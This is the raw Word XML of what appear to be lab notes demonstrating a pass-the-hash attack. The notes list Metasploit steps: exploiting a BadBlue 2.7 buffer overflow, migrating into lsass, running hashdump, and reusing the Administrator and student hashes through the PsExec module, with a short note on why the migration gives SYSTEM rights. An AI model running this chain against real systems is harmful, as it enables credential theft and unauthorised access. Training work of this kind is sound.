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1C34" w14:textId="10BCC92E" w:rsidR="00853ABF" w:rsidRPr="00BC0CF2" w:rsidRDefault="008F4503">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00BC0CF2">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve">Pass-the-Hash </w:t>
      </w:r>
      <w:r w:rsidRPr="00BC0CF2">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>with</w:t>
      </w:r>
      <w:r w:rsidRPr="00BC0CF2">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00BC0CF2">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>PSExec</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00BC0CF2">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="254C927D" w14:textId="77777777" w:rsidR="008F4503" w:rsidRDefault="008F4503"/>
    <w:p w14:paraId="56D0FB8E" w14:textId="776CCA06" w:rsidR="008F4503" w:rsidRDefault="006E3D3B">
      <w:r>
        <w:t xml:space="preserve">Capturing or harvesting NTLM hashes </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="603ADE19" w14:textId="387B3AB2" w:rsidR="008F4503" w:rsidRDefault="006E3D3B">
      <w:r w:rsidRPr="006E3D3B">
        <w:t xml:space="preserve">An attack where an adversary uses a stolen </w:t>
      </w:r>
      <w:r w:rsidRPr="006E3D3B">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>NTLM password hash</w:t>
      </w:r>
      <w:r w:rsidRPr="006E3D3B">
        <w:t xml:space="preserve"> directly to authenticate as a user without needing the plaintext password.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5D434611" w14:textId="77777777" w:rsidR="006E3D3B" w:rsidRDefault="006E3D3B"/>
    <w:p w14:paraId="56B3F5D9" w14:textId="79778336" w:rsidR="006E3D3B" w:rsidRPr="006E3D3B" w:rsidRDefault="006E3D3B">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="006E3D3B">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>DEMO:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="68319E0A" w14:textId="63B0506B" w:rsidR="006E3D3B" w:rsidRDefault="006E3D3B"/>
    <w:p w14:paraId="6CFBA949" w14:textId="77777777" w:rsidR="00BC0CF2" w:rsidRDefault="00BC0CF2" w:rsidP="00BC0CF2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D9A3D26" w14:textId="77777777" w:rsidR="00BC0CF2" w:rsidRDefault="00BC0CF2" w:rsidP="00BC0CF2">
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>Msfconsole</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve"> -q</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7128965F" w14:textId="77777777" w:rsidR="00BC0CF2" w:rsidRDefault="00BC0CF2" w:rsidP="00BC0CF2">
      <w:r>
        <w:t xml:space="preserve">Workspace -a </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>mimikatz</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
    </w:p>
    <w:p w14:paraId="3D1DA3DD" w14:textId="77777777" w:rsidR="00BC0CF2" w:rsidRDefault="00BC0CF2" w:rsidP="00BC0CF2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352417BF" w14:textId="77777777" w:rsidR="00BC0CF2" w:rsidRDefault="00BC0CF2" w:rsidP="00BC0CF2"/>
    <w:p w14:paraId="44AFD8A6" w14:textId="77777777" w:rsidR="00BC0CF2" w:rsidRDefault="00BC0CF2" w:rsidP="00BC0CF2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29171F1D" w14:textId="77777777" w:rsidR="00BC0CF2" w:rsidRDefault="00BC0CF2" w:rsidP="00BC0CF2"/>
    <w:p w14:paraId="771167F5" w14:textId="77777777" w:rsidR="00BC0CF2" w:rsidRDefault="00BC0CF2" w:rsidP="00BC0CF2">
      <w:r>
        <w:t>#badblue version 2.7 is vuln to buffer overflow.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="71CE2CB2" w14:textId="77777777" w:rsidR="00BC0CF2" w:rsidRDefault="00BC0CF2" w:rsidP="00BC0CF2">
      <w:r>
        <w:t xml:space="preserve">Search </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>badblue</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve"> 2.7</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0D958AE6" w14:textId="77777777" w:rsidR="00BC0CF2" w:rsidRDefault="00BC0CF2" w:rsidP="00BC0CF2">
      <w:proofErr w:type="gramStart"/>
      <w:r>
        <w:t>Use(</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r>
        <w:t>index no)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3CFE5220" w14:textId="77777777" w:rsidR="00BC0CF2" w:rsidRDefault="00BC0CF2" w:rsidP="00BC0CF2">
      <w:r>
        <w:t>Show options</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="03A174CA" w14:textId="77777777" w:rsidR="00BC0CF2" w:rsidRDefault="00BC0CF2" w:rsidP="00BC0CF2">
      <w:r>
        <w:t xml:space="preserve">Set target </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="640A10B8" w14:textId="77777777" w:rsidR="00BC0CF2" w:rsidRDefault="00BC0CF2" w:rsidP="00BC0CF2">
      <w:r>
        <w:t xml:space="preserve"># </w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r>
        <w:t>show</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r>
        <w:t xml:space="preserve"> options</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="71304A8B" w14:textId="77777777" w:rsidR="00BC0CF2" w:rsidRDefault="00BC0CF2" w:rsidP="00BC0CF2"/>
    <w:p w14:paraId="64A89F52" w14:textId="77777777" w:rsidR="00BC0CF2" w:rsidRDefault="00BC0CF2" w:rsidP="00BC0CF2">
      <w:r>
        <w:t xml:space="preserve">Set target </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:proofErr w:type="gramStart"/>
      <w:r>
        <w:t>badblue</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:proofErr w:type="gramEnd"/>
      <w:r>
        <w:t>\ EE\ 2.7\ Universal</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="33F4EB20" w14:textId="77777777" w:rsidR="00BC0CF2" w:rsidRDefault="00BC0CF2" w:rsidP="00BC0CF2">
      <w:r>
        <w:t>Exploit</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="55ECF866" w14:textId="77777777" w:rsidR="00BC0CF2" w:rsidRDefault="00BC0CF2" w:rsidP="00BC0CF2">
      <w:r>
        <w:t xml:space="preserve"># </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>geet</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>meterpreter</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve"> session’</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7F024FB8" w14:textId="77777777" w:rsidR="00BC0CF2" w:rsidRDefault="00BC0CF2" w:rsidP="00BC0CF2"/>
    <w:p w14:paraId="16B950EA" w14:textId="77777777" w:rsidR="00BC0CF2" w:rsidRDefault="00BC0CF2" w:rsidP="00BC0CF2">
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:t>Sysinfo</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
    </w:p>
    <w:p w14:paraId="6AD96271" w14:textId="77777777" w:rsidR="00BC0CF2" w:rsidRDefault="00BC0CF2" w:rsidP="00BC0CF2">
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>Getuid</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
    </w:p>
    <w:p w14:paraId="759C35FD" w14:textId="7C733B57" w:rsidR="00BC0CF2" w:rsidRDefault="00BC0CF2">
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>Pgrep</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>lsass</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
    </w:p>
    <w:p w14:paraId="65E77215" w14:textId="77777777" w:rsidR="00BC0CF2" w:rsidRDefault="00BC0CF2"/>
    <w:p w14:paraId="1E9233DD" w14:textId="06D549D5" w:rsidR="00BC0CF2" w:rsidRDefault="00BC0CF2">
      <w:r>
        <w:t xml:space="preserve">Migrate </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>pid</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
    </w:p>
    <w:p w14:paraId="6B446CCD" w14:textId="06BC824F" w:rsidR="00BC0CF2" w:rsidRDefault="00BC0CF2">
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>Getuid</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
    </w:p>
    <w:p w14:paraId="0C0B3D4C" w14:textId="456247E3" w:rsidR="00BC0CF2" w:rsidRDefault="00BC0CF2">
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>Hashdump</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
    </w:p>
    <w:p w14:paraId="7306973A" w14:textId="65AC3856" w:rsidR="00BC0CF2" w:rsidRDefault="00BC0CF2">
      <w:r>
        <w:t>#safe these in the file</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6721F0F5" w14:textId="1F70C195" w:rsidR="00BC0CF2" w:rsidRDefault="00BC0CF2">
      <w:r>
        <w:t>Exit</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="766BCA85" w14:textId="77777777" w:rsidR="00BC0CF2" w:rsidRDefault="00BC0CF2"/>
    <w:p w14:paraId="17B836CD" w14:textId="0602242F" w:rsidR="00BC0CF2" w:rsidRDefault="00BC0CF2">
      <w:r>
        <w:t xml:space="preserve">Search </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>psexec</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
    </w:p>
    <w:p w14:paraId="08511690" w14:textId="5941330F" w:rsidR="00BC0CF2" w:rsidRDefault="00BC0CF2">
      <w:r>
        <w:t># exploit module</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="70F40A9F" w14:textId="5D41980F" w:rsidR="00BC0CF2" w:rsidRDefault="00BC0CF2">
      <w:r>
        <w:t>Use(</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>smb</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>/</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>psexec</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="346D6AF7" w14:textId="64AD5DC5" w:rsidR="00F65C7D" w:rsidRDefault="00BC0CF2">
      <w:r>
        <w:t>Set payload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559CC814" w14:textId="647A8AFA" w:rsidR="00BC0CF2" w:rsidRDefault="00BC0CF2">
      <w:r>
        <w:t>Show options</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0DB3EC19" w14:textId="30EDF2E6" w:rsidR="00BC0CF2" w:rsidRDefault="00BC0CF2">
      <w:r>
        <w:t xml:space="preserve">Set </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>SMBUser</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve"> Administrator</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="77289749" w14:textId="2FF9A833" w:rsidR="00C24322" w:rsidRDefault="00BC0CF2">
      <w:r>
        <w:t xml:space="preserve">Set </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>SMBPass</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve">   </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>hash_of_administrator</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
    </w:p>
    <w:p w14:paraId="4DF7B0B8" w14:textId="4BA0D5BF" w:rsidR="00C24322" w:rsidRDefault="00C24322">
      <w:r>
        <w:t>#lm+ntlm hash</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0BCA6178" w14:textId="7F66B9D6" w:rsidR="00BC0CF2" w:rsidRDefault="00F65C7D">
      <w:r>
        <w:t>Exploit</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="35AF838E" w14:textId="5338EA92" w:rsidR="00F65C7D" w:rsidRDefault="00F65C7D">
      <w:r>
        <w:t>#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 </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="11ABABF9" w14:textId="26DE1DC4" w:rsidR="00F65C7D" w:rsidRDefault="00F65C7D">
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>Sysinfo</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
    </w:p>
    <w:p w14:paraId="11EA765F" w14:textId="2AF278C2" w:rsidR="00F65C7D" w:rsidRDefault="00F65C7D">
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>Getuid</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
    </w:p>
    <w:p w14:paraId="5BA91874" w14:textId="4408A134" w:rsidR="00F65C7D" w:rsidRDefault="00F65C7D">
      <w:r>
        <w:t>Background</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="699BF79F" w14:textId="77777777" w:rsidR="00F65C7D" w:rsidRDefault="00F65C7D"/>
    <w:p w14:paraId="68C6AA12" w14:textId="77777777" w:rsidR="00F65C7D" w:rsidRDefault="00F65C7D"/>
    <w:p w14:paraId="08BDFA99" w14:textId="68DA9A2E" w:rsidR="00F65C7D" w:rsidRPr="00F65C7D" w:rsidRDefault="00F65C7D">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00F65C7D">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Now for student account:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="56E9ED5B" w14:textId="5282D347" w:rsidR="00F65C7D" w:rsidRDefault="00F65C7D" w:rsidP="00F65C7D">
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:t xml:space="preserve">Set </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>SMBUser</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t>student</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="67438EC7" w14:textId="1CF799E7" w:rsidR="00F65C7D" w:rsidRDefault="00F65C7D" w:rsidP="00F65C7D">
      <w:r>
        <w:t xml:space="preserve">Set </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>SMBPass</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve">   </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>hash_of_</w:t>
      </w:r>
      <w:r>
        <w:t>student</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
    </w:p>
    <w:p w14:paraId="322A4850" w14:textId="17CA4DBA" w:rsidR="00F65C7D" w:rsidRDefault="00F65C7D" w:rsidP="00F65C7D">
      <w:proofErr w:type="gramStart"/>
      <w:r>
        <w:t># change</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r>
        <w:t xml:space="preserve"> the port</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7EB44755" w14:textId="2074488C" w:rsidR="00F65C7D" w:rsidRDefault="00F65C7D" w:rsidP="00F65C7D">
      <w:r>
        <w:t>Exploit</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="11D01718" w14:textId="77777777" w:rsidR="00F65C7D" w:rsidRDefault="00F65C7D" w:rsidP="00F65C7D"/>
    <w:p w14:paraId="0223A5DB" w14:textId="4CB50DCC" w:rsidR="00F65C7D" w:rsidRDefault="00F65C7D"/>
    <w:p w14:paraId="700AB41A" w14:textId="79FD2FB1" w:rsidR="00BC0CF2" w:rsidRPr="00EF3B4F" w:rsidRDefault="00EF3B4F">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00EF3B4F">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>NOTE:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="18BB4839" w14:textId="17D93F56" w:rsidR="00EF3B4F" w:rsidRDefault="00EF3B4F">
      <w:r w:rsidRPr="00EF3B4F">
        <w:t xml:space="preserve">Migration into lsass.exe caused privilege escalation because that process runs as </w:t>
      </w:r>
      <w:r w:rsidRPr="00EF3B4F">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>SYSTEM</w:t>
      </w:r>
      <w:r w:rsidRPr="00EF3B4F">
        <w:t xml:space="preserve">, and Meterpreter inherited its </w:t>
      </w:r>
      <w:r w:rsidRPr="00EF3B4F">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>SYSTEM-level access token</w:t>
      </w:r>
      <w:r w:rsidRPr="00EF3B4F">
        <w:t>.</w:t>
      </w:r>
    </w:p>
    <w:sectPr w:rsidR="00EF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CE"/>
    <w:rsid w:val="00551663"/>
    <w:rsid w:val="00595B1E"/>
    <w:rsid w:val="006E3D3B"/>
    <w:rsid w:val="00853ABF"/>
    <w:rsid w:val="008F4503"/>
    <w:rsid w:val="00B078CE"/>
    <w:rsid w:val="00BC0CF2"/>
    <w:rsid w:val="00C24322"/>
    <w:rsid w:val="00DF7501"/>
    <w:rsid w:val="00EF3B4F"/>
    <w:rsid w:val="00F6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AEE7"/>
  <w15:chartTrackingRefBased/>
  <w15:docId w15:val="{57FFA52A-188C-40C7-B175-1EF46B18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10</cp:revision>
  <dcterms:created xsi:type="dcterms:W3CDTF">2025-10-11T12:13:00Z</dcterms:created>
  <dcterms:modified xsi:type="dcterms:W3CDTF">2025-10-11T12:44:00Z</dcterms:modified>
</cp:coreProperties>
</file>